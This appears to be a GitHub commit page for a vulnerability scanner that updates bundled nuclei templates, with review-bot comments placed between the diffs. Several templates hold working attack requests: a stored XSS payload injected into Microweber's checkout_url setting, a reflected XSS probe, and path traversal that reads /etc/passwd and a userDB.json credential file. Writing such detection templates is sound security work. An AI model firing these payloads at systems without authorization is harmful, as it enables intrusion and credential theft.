

1、up PoCs
2、fixed filefuzz TestIs404 bug
3、fixed nuclei hang bug
 2022-08-04
hktalent committed Aug 4, 2022
1 parent b112384 commit b540316
Showing 19 changed files with 441 additions and 175 deletions.
101 changes: 40 additions & 61 deletions config/nuclei-templates/.new-additions
@@ -1,61 +1,40 @@
cves/2015/CVE-2015-4666.yaml
cves/2018/CVE-2018-1000856.yaml
cves/2018/CVE-2018-19136.yaml
cves/2018/CVE-2018-19137.yaml
cves/2018/CVE-2018-19751.yaml
cves/2018/CVE-2018-19752.yaml
cves/2018/CVE-2018-19892.yaml
cves/2019/CVE-2019-9922.yaml
cves/2021/CVE-2021-36450.yaml
cves/2022/CVE-2022-0656.yaml
cves/2022/CVE-2022-35416.yaml
exposed-panels/claris-filemaker-webdirect.yaml
exposed-panels/honeywell-xl-web-controller.yaml
exposed-panels/icewarp-panel-detect.yaml
exposed-panels/kafka-manager-panel.yaml
exposed-panels/noescape-login.yaml
exposed-panels/rustici-content-controller.yaml
exposed-panels/smartping-dashboard.yaml
exposed-panels/sonicwall-analyzer-login.yaml
exposed-panels/tembosocial-panel.yaml
exposed-panels/tenda-web-master.yaml
exposed-panels/tiny-file-manager.yaml
exposed-panels/veeam-backup-gcp.yaml
exposed-panels/vmware-carbon-black-edr.yaml
exposed-panels/vmware-cloud-availability.yaml
exposed-panels/vmware-cloud-director.yaml
exposed-panels/vmware-ftp-server.yaml
exposed-panels/vmware-horizon-daas.yaml
exposed-panels/vmware-vcenter-converter-standalone.yaml
exposed-panels/vmware-vcloud-director.yaml
exposed-panels/web-file-manager.yaml
exposures/configs/config-rb.yaml
exposures/configs/gcloud-config-default.yaml
exposures/configs/phpstan-config.yaml
exposures/configs/wgetrc-config.yaml
exposures/files/composer-auth-json.yaml
exposures/files/credentials-json.yaml
exposures/files/environment-rb.yaml
exposures/files/gcloud-access-token.yaml
exposures/files/gcloud-credentials.yaml
exposures/files/get-access-token-json.yaml
exposures/files/google-api-private-key.yaml
exposures/files/google-services-json.yaml
exposures/files/jsapi-ticket-json.yaml
exposures/files/npm-cli-metrics-json.yaml
exposures/files/oauth-credentials-json.yaml
exposures/files/secret-token-rb.yaml
exposures/files/service-account-credentials.yaml
exposures/files/symfony-properties-ini.yaml
exposures/files/token-info-json.yaml
exposures/files/token-json.yaml
exposures/files/wget-hsts-list-exposure.yaml
exposures/files/ws-ftp-ini.yaml
exposures/logs/event-debug-server-status.yaml
exposures/logs/git-logs-exposure.yaml
technologies/default-page-azure-container.yaml
technologies/default-parallels-plesk.yaml
technologies/json-server.yaml
technologies/samsung-smarttv-debug.yaml
vulnerabilities/other/opennms-log4j-jndi-rce.yaml
vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
cves/2018/CVE-2018-1000671.yaml
cves/2020/CVE-2020-13405.yaml
cves/2020/CVE-2020-9043.yaml
cves/2022/CVE-2022-0870.yaml
cves/2022/CVE-2022-0921.yaml
cves/2022/CVE-2022-0952.yaml
cves/2022/CVE-2022-0963.yaml
cves/2022/CVE-2022-1386.yaml
cves/2022/CVE-2022-1937.yaml
cves/2022/CVE-2022-2486.yaml
cves/2022/CVE-2022-2487.yaml
cves/2022/CVE-2022-2488.yaml
cves/2022/CVE-2022-30073.yaml
cves/2022/CVE-2022-34049.yaml
exposed-panels/goanywhere-mft-login.yaml
exposed-panels/mailwatch-login.yaml
exposed-panels/scriptcase/scriptcase-panel.yaml
exposed-panels/scriptcase/scriptcase-prod-login.yaml
exposures/apis/drupal-jsonapi-user-listing.yaml
misconfiguration/springboot/springboot-caches.yaml
misconfiguration/springboot/springboot-flyway.yaml
misconfiguration/springboot/springboot-scheduledtasks.yaml
technologies/nextcloud-owncloud-detect.yaml
token-spray/api-clickup.yaml
token-spray/api-clockify.yaml
token-spray/api-cloudconvert.yaml
token-spray/api-codestats.yaml
token-spray/api-craftmypdf.yaml
token-spray/api-flowdash.yaml
token-spray/api-html2pdf.yaml
token-spray/api-monday.yaml
token-spray/api-pdflayer.yaml
vulnerabilities/backdoor/jexboss-backdoor.yaml
vulnerabilities/jira/jira-servicedesk-signup.yaml
vulnerabilities/other/cvms-sqli.yaml
vulnerabilities/other/loancms-sqli.yaml
vulnerabilities/other/weiphp-sql-injection.yaml
vulnerabilities/other/zms-sqli.yaml
vulnerabilities/other/zzcms-xss.yaml
vulnerabilities/wordpress/analytify-plugin-xss.yaml
2 changes: 1 addition & 1 deletion config/nuclei-templates/cves/2022/CVE-2022-0921.yaml
Expand Up @@ -17,7 +17,7 @@ info:
cve-id: CVE-2022-0954
cwe-id: CWE-79
metadata:
verified: "true"
verified: true
tags: cve,cve2022,xss,microweber

requests:
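Review bot: The file this hunk edits, config/nuclei-templates/cves/2022/CVE-2022-0921.yaml, still carries `cve-id: CVE-2022-0954` and `tags: cve,cve2022,xss,microweber` on both sides of the change, while the same commit adds a separate CVE-2022-0954.yaml; the file looks like a mis-named duplicate rather than a template for CVE-2022-0921. The one-line change here only swaps the quoted `"true"` for the boolean `true`, so the mismatch survives the commit, and a scan would presumably report the CVE-2022-0954 check twice and nothing for CVE-2022-0921. Either the `id`/`cve-id`/description (the `id:` line and the request body lie outside the hunk) should be brought in line with the filename, or this file should be dropped in favour of the new CVE-2022-0954.yaml.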
57 changes: 57 additions & 0 deletions config/nuclei-templates/cves/2022/CVE-2022-0954.yaml
@@ -0,0 +1,57 @@
id: CVE-2022-0954

info:
name: Microweber - Cross-site Scripting
author: amit-jd
severity: medium
description: |
Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.
reference:
- https://github.com/advisories/GHSA-8c76-mxv5-w4g8
- https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
- https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-0954
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,microweber

requests:
- raw:
- |
POST /api/user_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
POST /api/save_option HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}/admin/view:shop/action:options
option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
- |
POST /module/ HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}/admin/view:shop/action:options
module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2,"true")'
- contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default')
- 'contains(all_headers_3,"text/html")'
- 'status_code_3==200'
condition: and
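Review bot: `verified: "true"` under `metadata` is a quoted string, whereas every other template touched by this commit (CVE-2022-1906, jamf-setup-assistant, symfony-debug, omnia-mpx-lfi, and the sibling fix to CVE-2022-0921.yaml) writes the boolean `verified: true`; change it to `verified: true` for consistency. The template also depends on `{{username}}` and `{{password}}` variables that are declared nowhere in the file, and its second request persists the XSS payload into the shop's `checkout_url` option without restoring it, so the `description` should state that the check is authenticated and modifies target state, for example `Requires {{username}}/{{password}}; writes a stored payload into the checkout_url option and does not revert it.`. The first raw request uses `HTTP/1.1` while the second and third use `HTTP/2`; whether nuclei's raw request engine honours an HTTP/2 request line is not evident from this page, so keeping all three on `HTTP/1.1` would be the safer choice.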
39 changes: 39 additions & 0 deletions config/nuclei-templates/cves/2022/CVE-2022-1906.yaml
@@ -0,0 +1,39 @@
id: CVE-2022-1906

info:
name: Copyright Proof <= 4.16 - Reflected Cross-Site-Scripting
author: random-robbie
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting when a specific setting is enabled.
reference:
- https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338
- https://nvd.nist.gov/vuln/detail/CVE-2022-1906
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1906
metadata:
verified: true
google-dork: inurl:/wp-content/plugins/digiproveblog
tags: cve,cve2022,wordpress,xss,wp-plugin,wp

requests:
- raw:
- |
GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "got message <script>alert(document.domain)</script>"
condition: and

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
40 changes: 0 additions & 40 deletions config/nuclei-templates/dns/cname-service-detection.yaml

This file was deleted.

25 changes: 25 additions & 0 deletions config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml
@@ -0,0 +1,25 @@
id: jamf-setup-assistant

info:
name: Jamf Pro Setup Assistant
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: http.html:"Jamf Pro Setup"
tags: jamf,setup,panel

requests:
- method: GET
path:
- "{{BaseURL}}/setupAssistant.html"

matchers-condition: and
matchers:
- type: word
words:
- "Jamf Pro Setup Assistant"

- type: status
status:
- 200
12 changes: 8 additions & 4 deletions config/nuclei-templates/exposures/configs/symfony-profiler.yaml
Expand Up @@ -4,16 +4,20 @@ info:
name: Symfony Profiler
author: pdteam
severity: high
metadata:
verified: true
shodan-query: http.html:"symfony Profiler"
tags: config,exposure,symfony

requests:
- method: GET
path:
- "{{BaseURL}}/_profiler/empty/search/results?limit=10"
- "{{BaseURL}}/app_dev.php/_profiler/empty/search/results?limit=10"

stop-at-first-match: true
matchers:
- type: word
words:
- "<title>Symfony Profiler</title>"
- "symfony/profiler/"
condition: and
part: body
words:
- "Symfony Profiler"
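Review bot: The matcher that closes this hunk — a single `part: body` word `"Symfony Profiler"` with no `condition` — is looser than the `<title>Symfony Profiler</title>` plus `symfony/profiler/` pair with `condition: and` that it appears to replace, so any page merely mentioning the product name (documentation, a blog post, a vendor page) would raise this high-severity finding. This rendered page does not mark which lines are old and new, so the side assignment is inferred from print order and the section's 8/4 diffstat. If the loosened matcher is indeed the new side, keeping both original terms, or adding a `- type: status` matcher with `matchers-condition: and`, would preserve the earlier precision while still covering the added `app_dev.php/_profiler` path.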
35 changes: 35 additions & 0 deletions config/nuclei-templates/misconfiguration/symfony-debug.yaml
@@ -0,0 +1,35 @@
id: symfony-debug

info:
name: Symfony Debug Mode
author: organiccrap,pdteam
severity: high
description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code.
reference:
- https://github.com/synacktiv/eos
metadata:
verified: true
shodan-query: http.html:"symfony Profiler"
tags: symfony,debug

requests:
- method: GET
path:
- '{{BaseURL}}'

matchers-condition: or
matchers:
- type: word
part: header
words:
- 'x-debug-token-link:'
- '/_profiler/'
condition: and
case-insensitive: true

- type: word
part: body
words:
- 'debug mode</a> is enabled.'

# Enhanced by mp on 2022/04/12

This file was deleted.

35 changes: 35 additions & 0 deletions config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml
@@ -0,0 +1,35 @@
id: omnia-mpx-lfi

info:
name: Omnia MPX 1.5.0+r1 - Path Traversal
author: arafatansari,ritikchaddha
severity: high
description: |
Omnia MPX 1.5.0+r1 is vulnerable to Path Traversal.
reference:
- https://www.exploit-db.com/exploits/50996
metadata:
verified: true
shodan-query: http.html:"Omnia MPX"
tags: omnia,mpx,lfi,traversal

requests:
- method: GET
path:
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"

stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
regex:
- "root:[x*]:0:0"

- type: word
part: body
words:
- '"username":'
- '"password":'
- '"id":'
condition: and
